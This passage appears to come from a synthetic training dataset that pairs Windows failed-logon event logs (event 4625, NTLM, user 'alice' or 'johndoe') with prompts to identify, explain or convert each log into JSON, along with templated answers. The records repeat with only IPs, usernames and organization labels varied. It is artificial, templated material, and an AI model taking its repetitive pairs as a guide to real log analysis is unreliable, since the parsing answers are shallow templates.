Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"stark\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"241.157.102.148\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6122059274", "streamName": "microsoft-windows-security-auditing", "clientIP": "241.157.102.148", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t241.157.102.148\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"241.157.102.148","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t241.157.102.148\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"241.157.102.148","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 54979 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6122059274 streamName: microsoft-windows-security-auditing clientIP: 241.157.102.148 userName: alice
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t34.210.231.151\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"34.210.231.151","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
{ "action": "Logon", "clientport": 54979, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t34.210.231.151\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"wayne\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"34.210.231.151\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6122059274", "streamName": "microsoft-windows-security-auditing", "clientIP": "34.210.231.151", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t34.210.231.151\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"34.210.231.151","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t34.210.231.151\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"34.210.231.151","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 54979 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6122059274 streamName: microsoft-windows-security-auditing clientIP: 34.210.231.151 userName: alice
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t65.144.153.227\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"65.144.153.227","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
{ "action": "Logon", "clientport": 54979, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tjohndoe\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t65.144.153.227\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- 